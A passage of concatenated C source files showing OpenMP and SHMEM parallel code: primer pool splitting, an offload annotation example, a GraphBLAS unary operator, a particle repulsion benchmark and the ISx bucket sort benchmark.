if(maxCount) while(poolCounts[poolOfMove(moves[moveToMake],nPools,pools)]==maxCount) if(++moveToMake==numMoves) moveToMake=0;
make_a_move(moves[moveToMake],ap.np,scores,primerMove_depends_on,nPools,pools,bContrib,poolCounts,maxCount);
} continue; /* don't do the additional make_a_move below (we'd have to repeat the maxCount condition) */
} else {
/* local maxima keep getting worse...
get me out of here! */
break;
}
}
#if USE_QSORT
int i = 0;
while(!(ThreadRand()%5) && i<numMoves-1 && valueOfMove(moves[i+1],nPools,pools,bContrib,poolCounts,maxCount)) ++i; /* sometimes don't pick the best one, just in case (TODO: can we write code to "get the top N items" w/out a complete sort?) */
bestMove = moves[i];
#endif
make_a_move(bestMove,ap.np,scores,primerMove_depends_on,nPools,pools,bContrib,poolCounts,maxCount);
}
}
if(bContrib) free(bContrib);
if(pools) free(pools);
free(poolCounts);
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
*totalIterations += iter;
}
PS_cache PS_precalc(AllPrimers ap,const float *table,const char *overlappingAmplicons,const int *primerNoToAmpliconNo,int nAmplicons) {
PS_cache r;
addTags(ap);
r.scores = table ? dGtriangle(ap,table) : triangle(ap);
removeTags(ap);
r.primerMove_depends_on = merge_scores_of_stuckTogether_primers(ap,r.scores);
r.fix_to_pool = pre_fix_primers_to_pools(ap);
if(memFail(r.scores,r.primerMove_depends_on,r.fix_to_pool,_memFail)) r.scores = NULL;
else {
saturate_scores_of_overlapping_primers(r.scores,overlappingAmplicons,primerNoToAmpliconNo,nAmplicons,ap.np);
r.fix_min_pools = 2;
int i; for(i=0; i<ap.np; i++) if(r.fix_to_pool[i]>=r.fix_min_pools) r.fix_min_pools=r.fix_to_pool[i]+1;
}
return r;
}
void PS_free(PS_cache c) {
if(c.scores) {
free(c.scores);
free(c.primerMove_depends_on);
free(c.fix_to_pool);
}
}
int* split_into_pools(AllPrimers ap,int nPools,int timeLimit,PS_cache cache,int seedless,const float *table,int maxCount) {
int *scores = cache.scores; if(!scores) return NULL;
int *primerMove_depends_on = cache.primerMove_depends_on;
int *fix_to_pool = cache.fix_to_pool;
if(nPools<cache.fix_min_pools) { fprintf(stderr,"ERROR: @%d:primers need at least %d pools, but only got %d\n",cache.fix_min_pools,cache.fix_min_pools,nPools); return NULL; }
if(maxCount) { int denom=0,i; for(i=0; i<ap.np; i++) if(primerMove_depends_on[i]!=-1) denom++; maxCount=maxCount*denom/ap.np; if(!maxCount) maxCount=1; } /* pairs */
int numMoves=0,*shared_moves=initMoves(&numMoves,ap.np,nPools,primerMove_depends_on,fix_to_pool); /* =0 to stop warnings on old compilers */
if(memFail(shared_moves,_memFail)) return NULL;
if(!numMoves) {
fputs("Can't move anything!\n",stderr);
free(shared_moves); return NULL;
}
int *bestPools = malloc(ap.np*sizeof(int));
if(memFail(shared_moves,bestPools,_memFail)) return NULL;
time_t start = time(NULL);
srand(seedless ? 1 : start);
int bestPools_init_yet = 0; ULL gBadLast=0; /* latter =0 to stop warnings on old compilers */
time_t lastOutputTime = (time_t)0; /* so the 1st maximum gets output no matter what (might be needed if we break right after) */
time_t limitTime = (time_t)0; if(timeLimit) limitTime = time(NULL) + timeLimit*60; /* (timeLimit is in minutes) */
int just_printed_counts = 0, overlaps = 0;
stop_state = s_KeepGoing; signal(SIGINT, intHandler);
if(omp_get_max_threads() > 1) {
if(seedless) { omp_set_num_threads(1); fputs("NOT parallelising the pool trials, as you asked for predictability.\n",stderr); }
else fprintf(stderr,"Parallelising pool trials: %d threads\n",omp_get_max_threads());
}
fprintf(stderr,"OK, here goes... (press Control-C to stop%s)\n",timeLimit?" early":""); fflush(stderr);
long totalIterations = 0;
ThreadMask threads_needing_to_reset_iter = 0;
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp parallel
#endif
poolsplit_thread(shared_moves,ap,nPools,numMoves,primerMove_depends_on,fix_to_pool,scores,limitTime,bestPools,table, &bestPools_init_yet,&gBadLast,&totalIterations,&lastOutputTime,&overlaps,&just_printed_counts,&threads_needing_to_reset_iter,maxCount);
signal(SIGINT, SIG_DFL);
if(!just_printed_counts) {
fputs("... looks like this is the best I can do:\n",stderr);
overlaps = table ? dGprintPooledCounts(ap,bestPools,scores,stderr) : printPooledCounts(ap,bestPools,scores);
int *counts=numInEachPool(bestPools,ap.np,nPools,primerMove_depends_on);
if(counts) {
printNumInEachPool(counts,nPools);
free(counts);
}
}
long numSecs = (long)(time(NULL)-start);
if(!numSecs) numSecs=1; /* so division doesn't crash */
fprintf(stderr,"%" QUOT "ld moves",totalIterations);
prnSeconds(numSecs); fprintf(stderr," = %" QUOT "ld/sec\n",totalIterations/numSecs);
if(bestPools && overlaps) {
if(stop_state == s_tooManyIters) fprintf(stderr,"WARNING: There are still overlaps in these pools,\neven after this number of moves.\nYou might need more pools.\n");
else fprintf(stderr,"WARNING: There are still overlaps in these pools.\nMaybe you should have let it run longer\nto see if these overlaps can be eliminated.\n");
} fflush(stderr);
free(shared_moves); return bestPools;
}
int suggest_num_pools(AllPrimers ap,PS_cache cache,const float *table) {
/* Apply a simple threshold-based allocation just for
suggesting a number of pools */
int threshold = table ? 14 : 7; /* dG -7 or score 7. TODO: customise? but this function is for when the user is not sure, so perhaps we'd best hard-code the threshold */
int nPools = ap.np; /* worst case is none of the primers are paired (unpaired primers could hang randomise_pools before v1.42 because this line said ap.np/2) */
int *scores = cache.scores; if(!scores) return 0;
int *primerMove_depends_on = cache.primerMove_depends_on;
int *fix_to_pool = cache.fix_to_pool;
ULL *bContrib = malloc(ap.np*nPools*sizeof(ULL));
int *poolCounts=malloc(nPools*sizeof(int));
int *pools = malloc(ap.np*sizeof(int));
if(memFail(bContrib,poolCounts,pools,_memFail))
return 0;
randomise_pools(ap.np,primerMove_depends_on,fix_to_pool,scores,nPools,pools,bContrib,poolCounts,1); /* puts 0 or 1 set in each pool (after the fixed ones) */
int suggest_nPools = 1;
int primer; for (primer=0; primer<ap.np; primer++) if (primerMove_depends_on[primer]==-1) {
if (fix_to_pool[primer]==-1) {
int destPool; for (destPool=0; destPool < suggest_nPools; destPool++) if(maxScoreOfBadness(bContrib[primerAndPool_to_contribOffset(primer,destPool,nPools)]) <= threshold) break; /* find first pool it will 'fit' in */
if (destPool == suggest_nPools) suggest_nPools++;
if (pools[primer] != destPool) make_a_move(primerAndDest_to_moveNo(primer,destPool,nPools,pools),ap.np,scores,primerMove_depends_on,nPools,pools,bContrib,poolCounts,ap.np);
} else if (fix_to_pool[primer] >= suggest_nPools) {
/* must have at least as many for the fixed-pool primers
(and fix_to_pool starts numbering at 0, so +1 of course) */
suggest_nPools = fix_to_pool[primer] + 1;
}
}
free(bContrib); free(pools); free(poolCounts);
return suggest_nPools;
}
|
example.c | // PWR026: Annotate function for OpenMP offload
// https://www.appentra.com/knowledge/checks/pwr026
int foo(int a) { return 2 * a; }
void example(int n, int *A) {
#pragma omp target teams distribute parallel for
for (int i = 0; i < n; i++) {
A[i] = foo(i);
}
}
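// A minimal sketch of the annotation this check suggests, assuming an
// OpenMP 4.0+ compiler with offload support: 'declare target' compiles a
// device version of the function so the offloaded loop can call it.
// The _device/_annotated names below are illustrative additions, not
// part of the original example.
#pragma omp declare target
int foo_device(int a) { return 2 * a; }
#pragma omp end declare target
void example_annotated(int n, int *A) {
#pragma omp target teams distribute parallel for map(from: A[0:n])
  for (int i = 0; i < n; i++) {
    A[i] = foo_device(i);
  }
}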
|
GB_unop__identity_bool_uint32.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2022, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCUDA_DEV
#include "GB_control.h"
#include "GB_atomics.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB (_unop_apply__identity_bool_uint32)
// op(A') function: GB (_unop_tran__identity_bool_uint32)
// C type: bool
// A type: uint32_t
// cast: bool cij = (bool) aij
// unaryop: cij = aij
#define GB_ATYPE \
uint32_t
#define GB_CTYPE \
bool
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
uint32_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = x ;
// casting
#define GB_CAST(z, aij) \
bool z = (bool) aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
uint32_t aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
bool z = (bool) aij ; \
Cx [pC] = z ; \
}
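// For reference, GB_CAST_OP(3,7) expands to: read aij = Ax[7] as uint32_t,
// cast it to bool, and store the result in Cx[3].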
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_IDENTITY || GxB_NO_BOOL || GxB_NO_UINT32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_apply__identity_bool_uint32)
(
bool *Cx, // Cx and Ax may be aliased
const uint32_t *Ax,
const int8_t *restrict Ab, // A->b if A is bitmap
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
if (Ab == NULL)
{
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
uint32_t aij = Ax [p] ;
bool z = (bool) aij ;
Cx [p] = z ;
}
}
else
{
// bitmap case, no transpose; A->b already memcpy'd into C->b
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!Ab [p]) continue ;
uint32_t aij = Ax [p] ;
bool z = (bool) aij ;
Cx [p] = z ;
}
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_tran__identity_bool_uint32)
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
Repulsive_forces.c | #include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <sys/time.h>
#include <omp.h>
double get_walltime() {
struct timeval tp; gettimeofday(&tp, NULL);
return (double) (tp.tv_sec + tp.tv_usec * 1e-6);
}
void force_repulsion(int np, const double *pos, double L, double krepulsion, double *forces) {
int i, j;
double posi [3]; double rvec [3];
double s2, s, f;
// initialize forces to zero
for (i = 0; i < 3 * np; i++) {
forces[i] = 0.;
}
// loop over all pairs
for (i = 0; i < np; i++) {
posi[0] = pos[3 * i];
posi[1] = pos[3 * i + 1];
posi[2] = pos[3 * i + 2];
for (j = i + 1; j < np; j++) {
// compute minimum image difference
rvec[0] = remainder(posi[0] - pos[3 * j], L);
rvec[1] = remainder(posi[1] - pos[3 * j + 1], L);
rvec[2] = remainder(posi[2] - pos[3 * j + 2], L);
s2 = rvec [0]* rvec [0] + rvec [1]* rvec [1] + rvec [2]* rvec [2];
if (s2 < 4) {
s = sqrt(s2);
rvec[0] /= s;
rvec[1] /= s;
rvec[2] /= s;
f = krepulsion*(2. - s);
forces[3 * i] += f * rvec[0];
forces[3 * i + 1] += f * rvec[1];
forces[3 * i + 2] += f * rvec[2];
forces[3 * j] += -f * rvec[0];
forces[3 * j + 1] += -f * rvec[1];
forces[3 * j + 2] += -f * rvec[2];
}
}
}
}
void force_repulsion_Parallel(int np, const double *pos, double L, double krepulsion, double *forces) {
int i, j;
double posi [3]; double rvec [3];
double s2, s, f;
// omp_get_num_threads() returns 1 outside a parallel region, which would
// force this "parallel" version onto a single thread; use
// omp_get_max_threads() to keep the available thread count.
omp_set_num_threads(omp_get_max_threads());
// initialize forces to zero
#pragma omp parallel for schedule(static) private (i)
for (i = 0; i < 3 * np; i++) {
forces[i] = 0.;
}
// loop over all pairs
#pragma omp parallel for schedule(static) private (i, j, rvec, posi, s2, s, f) shared(np, L , krepulsion, pos, forces)
for (i = 0; i < np; i++) {
posi[0] = pos[3 * i];
posi[1] = pos[3 * i + 1];
posi[2] = pos[3 * i + 2];
for (j = i + 1; j < np; j++) {
// compute minimum image difference
rvec[0] = remainder(posi[0] - pos[3 * j], L);
rvec[1] = remainder(posi[1] - pos[3 * j + 1], L);
rvec[2] = remainder(posi[2] - pos[3 * j + 2], L);
s2 = rvec[0] * rvec[0] + rvec[1] * rvec[1] + rvec[2] * rvec[2];
if (s2 < 4) {
s = sqrt(s2);
rvec[0] /= s;
rvec[1] /= s;
rvec[2] /= s;
f = krepulsion*(2. - s);
#pragma omp critical(forces)
{
forces[3 * i] += f * rvec[0];
forces[3 * i + 1] += f * rvec[1];
forces[3 * i + 2] += f * rvec[2];
forces[3 * j] += -f * rvec[0];
forces[3 * j + 1] += -f * rvec[1];
forces[3 * j + 2] += -f * rvec[2];
}
}
}
}
}
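// A possible alternative to the critical section above, sketched on the
// assumption of an OpenMP 4.5+ compiler: an array-section reduction gives
// each thread a private copy of 'forces' that is summed once at the end,
// avoiding per-update locking. Illustrative only; not part of the
// original benchmark.
void force_repulsion_reduction(int np, const double *pos, double L, double krepulsion, double *forces) {
  // initialize forces to zero
  for (int i = 0; i < 3 * np; i++) {
    forces[i] = 0.;
  }
  #pragma omp parallel for schedule(dynamic) reduction(+: forces[0:3*np])
  for (int i = 0; i < np; i++) {
    double posi[3] = { pos[3 * i], pos[3 * i + 1], pos[3 * i + 2] };
    for (int j = i + 1; j < np; j++) {
      double rvec[3];
      rvec[0] = remainder(posi[0] - pos[3 * j], L);
      rvec[1] = remainder(posi[1] - pos[3 * j + 1], L);
      rvec[2] = remainder(posi[2] - pos[3 * j + 2], L);
      double s2 = rvec[0] * rvec[0] + rvec[1] * rvec[1] + rvec[2] * rvec[2];
      if (s2 < 4) {
        double s = sqrt(s2);
        double f = krepulsion * (2. - s);
        // same update as the critical section above, but into this
        // thread's private reduction copy of 'forces'
        for (int d = 0; d < 3; d++) {
          forces[3 * i + d] += f * rvec[d] / s;
          forces[3 * j + d] -= f * rvec[d] / s;
        }
      }
    }
  }
}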
int comparator(double *forces1, double *forces2, int np, double epsilon) {
for(int i = 0; i < 3 * np; i++) {
if(fabs(forces1[i] - forces2[i]) > epsilon) {
return 0;
}
}
return 1;
}
int main(int argc, char *argv[]) {
int i;
int np = 1000; // default number of particles
double phi = 0.3; // volume fraction
double krepulsion = 125.; // force constant
double *pos; double *forces1; double *forces2;
double L, time0 , time1;
double epsilon = 1e-10; // significance value to compare the forces.
if (argc > 1) {
np = atoi(argv[1]);
}
L = pow(4./3. * 3.1415926536 * np/phi, 1./3.);
// generate random particle positions inside simulation box
forces1 = (double *) malloc(3 * np * sizeof(double));
forces2 = (double *) malloc(3 * np * sizeof(double));
pos = (double *) malloc(3 * np * sizeof(double));
for (i = 0; i < 3 * np; i++) {
pos[i] = rand()/(double)RAND_MAX * L;
}
// measure sequential execution time of this function
time0 = get_walltime ();
force_repulsion(np, pos, L, krepulsion, forces1);
time1 = get_walltime ();
printf("number of particles: %d\n", np);
printf("sequential elapsed time: %f\n", time1 - time0);
// measure parallel execution time of this function
time0 = get_walltime ();
force_repulsion_Parallel(np, pos, L, krepulsion, forces2);
time1 = get_walltime ();
printf("parallel elapsed time: %f\n", time1 - time0);
int result = comparator(forces1, forces2, np, epsilon);
if(result == 1) {
printf("forces match\n");
}
else {
printf("forces do not match\n");
}
free(forces1);
free(forces2);
free(pos);
return 0;
}
|
isx.c | /*
Copyright (c) 2015, Intel Corporation
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of Intel Corporation nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
#include <shmem.h>
#include <assert.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/time.h>
#include <math.h>
#include <string.h>
#include <unistd.h> // sleep()
#include <sys/stat.h>
#include <stdint.h>
#include "params.h"
#include "isx.h"
#include "timer.h"
#include "pcg_basic.h"
#if defined(_OPENMP)
#include <omp.h>
#endif
#define ROOT_PE 0
// Needed for shmem collective operations
int pWrk[_SHMEM_REDUCE_MIN_WRKDATA_SIZE];
double dWrk[_SHMEM_REDUCE_SYNC_SIZE];
long long int llWrk[_SHMEM_REDUCE_MIN_WRKDATA_SIZE];
long pSync[_SHMEM_REDUCE_SYNC_SIZE];
uint64_t NUM_PES; // Number of parallel workers
uint64_t TOTAL_KEYS; // Total number of keys across all PEs
uint64_t NUM_KEYS_PER_PE; // Number of keys generated on each PE
uint64_t NUM_BUCKETS; // The number of buckets in the bucket sort
uint64_t BUCKET_WIDTH; // The size of each bucket
uint64_t MAX_KEY_VAL; // The maximum possible generated key value
volatile int whose_turn;
long long int receive_offset = 0;
long long int my_bucket_size = 0;
#define PARALLEL_FOR_MODE SHMEM_PARALLEL_FOR_RECURSIVE_MODE
#define CHUNKS_COUNT_LOCAL_KEYS (actual_num_workers)
#define CHUNKS_MAKE_INPUT CHUNKS_PER_PE
int actual_num_workers;
int** local_bucket_sizes_chunk;
int ** my_local_key_counts;
KEY_TYPE*** my_local_bucketed_keys_chunk;
int** local_bucket_offsets_chunk;
/*
* This variable sets the maximum number of chunks allowed
* to participate in computation per pe.
*/
int CHUNKS_PER_PE=1;
#define GET_VIRTUAL_RANK(rank, chunk) (((rank) * actual_num_workers) + (chunk))
#define SHMEM_BARRIER_AT_START { timer_start(&timers[TIMER_BARRIER_START]); shmem_barrier_all(); timer_stop(&timers[TIMER_BARRIER_START]); }
#define SHMEM_BARRIER_AT_EXCHANGE { timer_start(&timers[TIMER_BARRIER_EXCHANGE]); shmem_barrier_all(); timer_stop(&timers[TIMER_BARRIER_EXCHANGE]); }
#define SHMEM_BARRIER_AT_END { timer_start(&timers[TIMER_BARRIER_END]); shmem_barrier_all(); timer_stop(&timers[TIMER_BARRIER_END]); }
// This is done due to a current limitation: the entrypoint function
// cannot accept arguments. This will be resolved in a future version of
// AsyncSHMEM
int m_argc;
char** m_argv;
#define EXTRA_STATS
#ifdef EXTRA_STATS
float avg_time=0, avg_time_all2all = 0;
#endif
#define KEY_BUFFER_SIZE (1uLL<<28uLL)
// The receive array for the All2All exchange
KEY_TYPE* my_bucket_keys;
#ifdef PERMUTE
int * permute_array;
#endif
void entrypoint(void *arg) {
char * log_file = parse_params(m_argc, m_argv);
init_shmem_sync_array(pSync);
bucket_sort();
log_times(log_file);
//return err;
}
int main (int argc, char ** argv) {
shmem_init ();
m_argc = argc;
m_argv = argv;
#ifdef EXTRA_STATS
_timer_t stage_time;
if(shmem_my_pe() == 0) {
printf("\n-----\nmkdir timedrun fake\n\n");
timer_start(&stage_time);
}
#endif
#if defined(_SHMEM_WORKERS)
shmem_workers_init(entrypoint, NULL);
#else
entrypoint(NULL);
#endif
#ifdef EXTRA_STATS
if(shmem_my_pe() == 0) {
just_timer_stop(&stage_time);
double tTime = ( stage_time.stop.tv_sec - stage_time.start.tv_sec ) + ( stage_time.stop.tv_nsec - stage_time.start.tv_nsec )/1E9;
avg_time *= 1000;
avg_time_all2all *= 1000;
printf("\n============================ MMTk Statistics Totals ============================\n");
if(NUM_ITERATIONS == 1) { //TODO: fix the time calculation below for more than one iteration
printf("time.mu\tt.ATA_KEYS\tt.MAKE_INPUT\tt.COUNT_BUCKET_SIZES\tt.BUCKETIZE\tt.COMPUTE_OFFSETS\tt.LOCAL_SORT\tBARRIER_AT_START\tBARRIER_AT_EXCHANGE\tBARRIER_AT_END\tnWorkers\tnPEs\n");
double TIMES[TIMER_NTIMERS];
memset(TIMES, 0x00, sizeof(double) * TIMER_NTIMERS);
for(uint64_t i=0; i<NUM_PES; i++) {
for(int t = 0; t < TIMER_NTIMERS; ++t){
if(timers[t].all_times != NULL){
TIMES[t] += timers[t].all_times[i];
}
}
}
for(int t = 0; t < TIMER_NTIMERS; ++t){
printf("%.3f\t", (TIMES[t]/NUM_PES)*1000);
}
printf("%d\t%d\n",actual_num_workers,NUM_PES);
printf("Total time: %.3f\n",(TIMES[0]/NUM_PES)*1000);
}
else {
printf("time.mu\ttimeAll2All\tnWorkers\tnPEs\n");
printf("%.3f\t%.3f\t%d\t%d\n",avg_time,avg_time_all2all,actual_num_workers,NUM_PES);
printf("Total time: %.3f\n",avg_time);
}
printf("------------------------------ End MMTk Statistics -----------------------------\n");
printf("===== TEST PASSED in %.3f msec =====\n",(tTime*1000));
}
#endif
shmem_finalize ();
return 0;
}
// Parses all of the command line input and definitions in params.h
// to set all necessary runtime values and options
static char * parse_params(const int argc, char ** argv)
{
if(argc != 3)
{
if( shmem_my_pe() == 0){
printf("Usage: \n");
printf(" ./%s <total num keys(strong) | keys per pe(weak)> <log_file>\n",argv[0]);
}
shmem_finalize();
exit(1);
}
const char* chunks_env = getenv("ISX_PE_CHUNKS");
CHUNKS_PER_PE = chunks_env ? atoi(chunks_env) : 1;
#if defined(_OPENMP)
#pragma omp parallel
actual_num_workers = omp_get_num_threads();
#elif defined(_SHMEM_WORKERS)
actual_num_workers = shmem_n_workers();
#else
CHUNKS_PER_PE = 1;
actual_num_workers = 1;
#endif
NUM_PES = (uint64_t) shmem_n_pes();
MAX_KEY_VAL = DEFAULT_MAX_KEY;
NUM_BUCKETS = NUM_PES;
BUCKET_WIDTH = (uint64_t) ceil((double)MAX_KEY_VAL/NUM_BUCKETS);
char * log_file = argv[2];
char scaling_msg[64];
switch(SCALING_OPTION){
case STRONG:
{
TOTAL_KEYS = (uint64_t) atoi(argv[1]);
NUM_KEYS_PER_PE = (uint64_t) ceil((double)TOTAL_KEYS/NUM_PES);
sprintf(scaling_msg,"STRONG");
break;
}
case WEAK:
{
NUM_KEYS_PER_PE = (uint64_t) (atoi(argv[1])) * actual_num_workers;
sprintf(scaling_msg,"WEAK");
break;
}
case WEAK_ISOBUCKET:
{
NUM_KEYS_PER_PE = (uint64_t) (atoi(argv[1])) * actual_num_workers;
BUCKET_WIDTH = ISO_BUCKET_WIDTH;
MAX_KEY_VAL = (uint64_t) (NUM_PES * actual_num_workers * BUCKET_WIDTH);
sprintf(scaling_msg,"WEAK_ISOBUCKET");
break;
}
default:
{
if(shmem_my_pe() == 0){
printf("Invalid scaling option! See params.h to define the scaling option.\n");
}
shmem_finalize();
exit(1);
break;
}
}
assert(NUM_KEYS_PER_PE % actual_num_workers == 0);
assert(MAX_KEY_VAL > 0);
assert(NUM_KEYS_PER_PE > 0);
assert(NUM_PES > 0);
assert(MAX_KEY_VAL > NUM_PES);
assert(NUM_BUCKETS > 0);
assert(BUCKET_WIDTH > 0);
if(shmem_my_pe() == 0){
printf("ISx v%1d.%1d\n",MAJOR_VERSION_NUMBER,MINOR_VERSION_NUMBER);
#ifdef PERMUTE
printf("Random Permute Used in ATA.\n");
#endif
printf(" Number of Keys per PE: %" PRIu64 "\n", NUM_KEYS_PER_PE);
printf(" Number of Chunks per PE (ISX_PE_CHUNKS): %d\n",CHUNKS_PER_PE);
#if defined(_OPENMP)
printf(" OpenMP Version, total workers: %d\n",actual_num_workers);
#elif defined(_SHMEM_WORKERS)
printf(" AsyncSHMEM Version, total workers: %d\n",actual_num_workers);
#else
printf(" AsyncSHMEM Sequential version\n");
#endif
printf(" Max Key Value: %" PRIu64 "\n", MAX_KEY_VAL);
printf(" Bucket Width: %" PRIu64 "\n", BUCKET_WIDTH);
printf(" Number of Iterations: %u\n", NUM_ITERATIONS);
printf(" Number of PEs: %" PRIu64 "\n", NUM_PES);
printf(" %s Scaling!\n",scaling_msg);
}
return log_file;
}
/*
* The primary compute function for the bucket sort
* Executes NUM_ITERATIONS + BURN_IN iterations in total, as defined in params.h
* Only iterations after the BURN_IN iterations are timed
* Only the final iteration calls the verification function
*/
static int bucket_sort(void)
{
int err = 0;
init_timers(NUM_ITERATIONS);
#ifdef PERMUTE
create_permutation_array();
#endif
my_bucket_keys = (KEY_TYPE*) shmem_malloc(KEY_BUFFER_SIZE * sizeof(KEY_TYPE));
my_local_key_counts = malloc(CHUNKS_COUNT_LOCAL_KEYS * sizeof(int*));
for(int i=0; i<CHUNKS_COUNT_LOCAL_KEYS; i++) my_local_key_counts[i] = malloc(BUCKET_WIDTH * sizeof(int));
for(uint64_t i = 0; i < (NUM_ITERATIONS + BURN_IN); ++i)
{
for(int i=0; i<CHUNKS_COUNT_LOCAL_KEYS; i++) memset(my_local_key_counts[i], 0x00, BUCKET_WIDTH * sizeof(int));
local_bucket_sizes_chunk = malloc(CHUNKS_PER_PE* sizeof(int*));
// Reset timers after burn in
if(i == BURN_IN){ init_timers(NUM_ITERATIONS); }
SHMEM_BARRIER_AT_START;
timer_start(&timers[TIMER_TOTAL]);
KEY_TYPE * my_keys = make_input();
int * local_bucket_sizes = count_local_bucket_sizes(my_keys);
int * send_offsets;
int * local_bucket_offsets = compute_local_bucket_offsets(local_bucket_sizes,
&send_offsets);
KEY_TYPE * my_local_bucketed_keys = bucketize_local_keys(my_keys, local_bucket_offsets);
KEY_TYPE * my_bucket_keys = exchange_keys(send_offsets,
local_bucket_sizes,
my_local_bucketed_keys);
my_bucket_size = receive_offset;
count_local_keys(my_bucket_keys);
SHMEM_BARRIER_AT_END;
timer_stop(&timers[TIMER_TOTAL]);
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
free(local_bucket_sizes_chunk[chunk]);
}
free(local_bucket_sizes_chunk);
// Only the last iteration is verified
if(i == NUM_ITERATIONS) {
err = verify_results(my_bucket_keys);
}
// Reset receive_offset used in exchange_keys
receive_offset = 0;
free(my_local_bucketed_keys);
free(my_keys);
free(local_bucket_sizes);
free(local_bucket_offsets);
free(send_offsets);
shmem_barrier_all();
}
for(int i=0; i<CHUNKS_COUNT_LOCAL_KEYS; i++) free(my_local_key_counts[i]);
free(my_local_key_counts);
return err;
}
#if defined(_SHMEM_WORKERS)
void make_input_async(void *args, int chunk) {
KEY_TYPE * restrict const my_keys = *((KEY_TYPE **) args);
const uint64_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_MAKE_INPUT;
const uint64_t start_index = chunk * keys_per_chunk;
const uint64_t max_index = start_index + keys_per_chunk;
pcg32_random_t rng = seed_my_chunk(chunk);
KEY_TYPE * restrict my_keys_1D = &(my_keys[start_index]);
for(uint64_t i=start_index; i<max_index; i++) {
*my_keys_1D = pcg32_boundedrand_r(&rng, MAX_KEY_VAL);
my_keys_1D += 1;
}
}
#endif
/*
* Generates uniformly random keys in [0, MAX_KEY_VAL) on each rank,
* seeding each chunk's random stream from its virtual rank
*/
static KEY_TYPE * make_input(void)
{
timer_start(&timers[TIMER_INPUT]);
KEY_TYPE * restrict const my_keys = malloc(NUM_KEYS_PER_PE * sizeof(KEY_TYPE));
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_MAKE_INPUT;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
shmem_task_scope_begin();
shmem_parallel_for_nbi(make_input_async, (void*)(&my_keys), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
int chunk; /* declared outside the #ifdef so the sequential build compiles too */
#if defined(_OPENMP)
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<CHUNKS_MAKE_INPUT; chunk++) {
const uint64_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_MAKE_INPUT;
const uint64_t start_index = chunk * keys_per_chunk;
const uint64_t max_index = start_index + keys_per_chunk;
pcg32_random_t rng = seed_my_chunk(chunk);
KEY_TYPE * restrict my_keys_1D = &(my_keys[start_index]);
for(uint64_t i=start_index; i<max_index; i++) {
*my_keys_1D = pcg32_boundedrand_r(&rng, MAX_KEY_VAL);
my_keys_1D += 1;
}
}
#endif
timer_stop(&timers[TIMER_INPUT]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: Initial Keys: ", my_rank);
for(uint64_t i = 0; i < NUM_KEYS_PER_PE; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_keys[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
